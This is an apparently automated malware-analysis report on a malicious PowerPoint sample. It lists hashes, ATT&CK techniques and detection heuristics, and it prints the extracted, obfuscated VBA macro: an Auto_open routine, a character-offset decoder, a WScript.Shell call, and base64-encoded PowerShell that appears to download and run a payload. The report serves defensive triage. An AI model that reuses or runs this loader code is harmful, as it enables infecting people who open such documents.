Office (OOXML) malware analysis — malicious · e8f1da4741c21528

MALICIOUS

Office (OOXML)

16.0 KB First seen: 2021-09-23

MD5: a475964f45c2e029789751d37d5cb71a SHA-1: 239f75bd4ca04a3b9093a13911ed3420aa310677 SHA-256: e8f1da4741c215285d9b16ea376624110a1efd44d53d34502ce6386405cfdf31

322 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1218.011 Signed Binary Proxy Execution: Rundll32

The sample is an OOXML document containing obfuscated VBA macros. The Auto_open macro utilizes WScript.Shell to execute a command, which is heavily obfuscated but appears to involve decoding and executing a payload. This indicates a macro-based downloader designed to fetch and run additional malware.

Heuristics 8

VBA project inside OOXML medium 6 related findings OOXML_VBA

Document contains a VBA project — VBA macros present
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
WScript.Shell usage critical OLE_VBA_WSCRIPT

WScript.Shell usage
Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER

Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
Auto_Open macro high OLE_VBA_AUTO

Auto_Open macro
CreateObject call high OLE_VBA_CREATEOBJ

CreateObject call
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE

One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.

Extracted artifacts 2

Files carved from inside the sample during analysis.

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source from OOXML)	5848 bytes
SHA-256: `d9d51546574120a4d7e7454d4aec29499915aa9de123f94e1d0c09a56d7edde1`
Detection ClamAV: No threats found Obfuscation or payload: likely Carved artifact contains 8 long base64-like blob(s).
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ajqa" Public Sub Auto_open() uqw.mn dsfdas = cxzvxzsf End Sub Attribute VB_Name = "uqw" Function ljknmn(ophji As Variant) sdfxc = "bvcvhgj cvnvcfh cvnvhgk" ljknmn = Chr(ophji - 130) vcxbdg = "vxvbxdfg cxfgh vcvn gfgh ,vbnvc cvcvn" End Function Function vkfeaba(bcvfleoaongikarien As String) ieruqnxxdokjsyhirdmgaa = 0 fdsaf = "cxvx cbbcvx vcxzvsdf fdasxcv" frgpkhesucwjqviihevpwiqubda = "WSCript.shell" Set ejzhshzqnqbqx = CreateObject(frgpkhesucwjqviihevpwiqubda) 'hjgjg ffhg5645n /*/ sofgnxspgilcwkfvrzex = ejzhshzqnqbqx.Run(bcvfleoaongikarien, ieruqnxxdokjsyhirdmgaa) End Function Sub mn() drgf = ljknmn(229) & ljknmn(239) & ljknmn(230) & ljknmn(162) & ljknmn(177) & ljknmn(229) & ljknmn(162) & ljknmn(210) & ljknmn(241) & ljknmn(224) & ljknmn(249) & ljknmn(224) & ljknmn(199) & ljknmn(212) & ljknmn(245) & ljknmn(224) & ljknmn(234) & ljknmn(231) & ljknmn(224) & ljknmn(238) & ljknmn(206) & ljknmn(162) & ljknmn(175) & ljknmn(199) & ljknmn(162) drgf = drgf & "WwBTAFkAcwB0AEUATQAuAFQARQB4AFQALgBFAG4AQwBPAEQAaQBuAEcAXQA6ADoAVQBOAGkAYwBvAEQAZQAuAEcAZQB0AFMAdABSAEkAbgBnACgAWwBzAHkAcwB0AEUAbQAuAEMATwBuAHYARQBSAHQAXQA6ADoARgBSAE8ATQBCAGEAcwBlADYANABzAHQAUgBpAE4ARwAoACIAZABBAEIAeQBBAEgAawBBAEkAQQBCADcAQQBHAFkAQQBiAHcAQgB5AEEAQwBBAEEASwBBAEEAawBBAEcAawBBAFAAUQBBAHgAQQBEAHMAQQBJAEEAQQBrAEEARwBrAEEASQBBAEEAdABBAEcAdwBBAFoAUQBBAGcAQQBEAEUAQQBNAGcAQQB3AEEARABBAEEATQBBAEEANwBBAEMAQQBBAEoAQQBCAHAAQQBDAHMAQQBLAHcAQQBwAEEAQwBBAEEAZQB3AEEAawBBAEcAawBBAEwAQQBBAGkAQQBHAEEAQQBiAGcAQQBpAEEASAAwAEEAZgBRAEEAZwBBAEcATQBBAFkAUQBCADAAQQBHAE0AQQBhAEEAQgA3AEEASAAwAEEARABRAEEASwBBA" drgf = drgf & "EcAWQBBAGQAUQBCAHUAQQBHAE0AQQBkAEEAQgBwAEEARwA4AEEAYgBnAEEAZwBBAEcAVQBBAGIAZwBCAHUAQQBHAE0AQQBaAHcAQgB6AEEASABrAEEAYwBRAEIAegBBAEcARQBBAFoAdwBCADMAQQBIAFEAQQBjAHcAQgBvAEEARwBNAEEAZAB3AEIAaABBAEcAdwBBAGEAdwBCAGoAQQBHAHcAQQBZAHcAQgBuAEEASABRAEEAZQBBAEIAdwBBAEgAQQBBAGMAZwBCADUAQQBHAG8AQQBhAHcAQgA0AEEAQwBBAEEASwBBAEEAZwBBAEMAUQBBAGUAZwBCAG4AQQBIAFEAQQBhAHcAQgByAEEARwA0AEEAZQBBAEIAcgBBAEcAbwBBAGIAQQBBAGcAQQBDAHcAQQBJAEEAQQBrAEEARwBJAEEAWQBRAEIAagBBAEgATQBBAFkAUQBCAHYAQQBIAGcAQQBkAHcAQgB0AEEARwBVAEEAYgBnAEIAawBBAEgATQBBAGEAdwBCAG4AQQBHAGsAQQBhAGcAQQBnAEEAQwBrAEEARABRAEEASwBBAEgAcwBBAEkAQQBCAEoAQQBHADAAQQ" drgf = drgf & "BjAEEAQgBQAEEASABJAEEAVgBBAEEAdABBAEcAMABBAGIAdwBCAEUAQQBGAFUAQQBiAEEAQgBsAEEAQwBBAEEAUQBnAEIASgBBAEgAUQBBAGMAdwBCADAAQQBIAEkAQQBRAFEAQgBPAEEASABNAEEAWgBnAEIAbABBAEYASQBBAE8AdwBBAE4AQQBBAG8AQQBVAHcAQgAwAEEARQBFAEEAVQBnAEIAVQBBAEMAMABBAFEAZwBCAEoAQQBGAFEAQQBVAHcAQgAwAEEASABJAEEAWQBRAEIAdQBBAEgATQBBAFoAZwBCAEYAQQBGAEkAQQBJAEEAQQB0AEEASABNAEEAYgB3AEIAVgBBAEgASQBBAFEAdwBCAEYAQQBDAEEAQQBKAEEAQgA2AEEARwBjAEEAZABBAEIAcgBBAEcAcwBBAGIAZwBCADQAQQBHAHMAQQBhAGcAQgBzAEEAQwBBAEEATABRAEIAawBBAEcAVQBBAFUAdwBCAFUAQQBFAGsAQQBUAGcAQgBCAEEARgBRAEEAYQBRAEIAUABBAEcANABBAEkAQQBBAGsAQQBHAEkAQQBZAFEAQgBqAEEASABNAEEAWQBRAEI" drgf = drgf & "AdgBBAEgAZwBBAGQAdwBCAHQAQQBHAFUAQQBiAGcAQgBrAEEASABNAEEAYQB3AEIAbgBBAEcAawBBAGEAZwBBADcAQQBDAEEAQQBKAGcAQQBnAEEAQwBRAEEAWQBnAEIAaABBAEcATQBBAGMAdwBCAGgAQQBHADgAQQBlAEEAQgAzAEEARwAwAEEAWgBRAEIAdQBBAEcAUQBBAGMAdwBCAHIAQQBHAGMAQQBhAFEAQgBxAEEARABzAEEASQBBAEIAOQBBAEgAUQBBAGMAZwBCADUAQQBIAHMAQQBKAEEAQgBwAEEARwBNAEEAYwBRAEIAdwBBAEcANABBAFoAUQBCADMAQQBHAFUAQQBlAGcAQgAyAEEARwBZAEEAWQBnAEIAcQBBAEcAcwBBAGEAQQBCAHQAQQBIAE0AQQBiAGcAQgBzAEEARwBvAEEAYQBnAEIAeQBBAEgASQBBAFAAUQBBAGsAQQBHAFUAQQBUAGcAQgAyAEEARABvAEEAVgBBAEIAbABBAEUAMABBAGMAQQBBAHIAQQBDAGMAQQBYAEEAQgBzAEEASABRAEEAZABnAEIAaABBAEMANABBAFoAUQBCADQAQQBH" drgf = drgf & "AFUAQQBKAHcAQQA3AEEAQQAwAEEAQwBnAEIAbABBAEcANABBAGIAZwBCAGoAQQBHAGMAQQBjAHcAQgA1AEEASABFAEEAYwB3AEIAaABBAEcAYwBBAGQAdwBCADAAQQBIAE0AQQBhAEEAQgBqAEEASABjAEEAWQBRAEIAcwBBAEcAcwBBAFkAdwBCAHMAQQBHAE0AQQBaAHcAQgAwAEEASABnAEEAYwBBAEIAdwBBAEgASQBBAGUAUQBCAHEAQQBHAHMAQQBlAEEAQQBnAEEAQwBjAEEAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABrAEEATgBRAEEAdQBBAEQASQBBAE4AQQBBAHkAQQBDADQAQQBNAFEAQQB4AEEARABBAEEATABnAEEAeABBAEQATQBBAEwAdwBCAEIAQQBHADQAQQBlAFEAQgBsAEEAQwA0AEEAWgBRAEIANABBAEcAVQBBAEoAdwBBAGcAQQBDAFEAQQBhAFEAQgBqAEEASABFAEEAYwBBAEIAdQBBAEcAVQBBAGQAdwBCAGwAQQBIAG8AQQB ... (truncated)
`vbaProject_00.bin`	vba-project	OOXML VBA project: ppt/vbaProject.bin	39936 bytes
SHA-256: `b98bc2a6340a0804ff04e8ecbbfc6f864aaeb0f5074a3a751b3201e71f93c437`
Detection ClamAV: No threats found Obfuscation or payload: likely Carved artifact contains 8 long base64-like blob(s).

Open this report in the interactive analyzer, or submit your own file for analysis.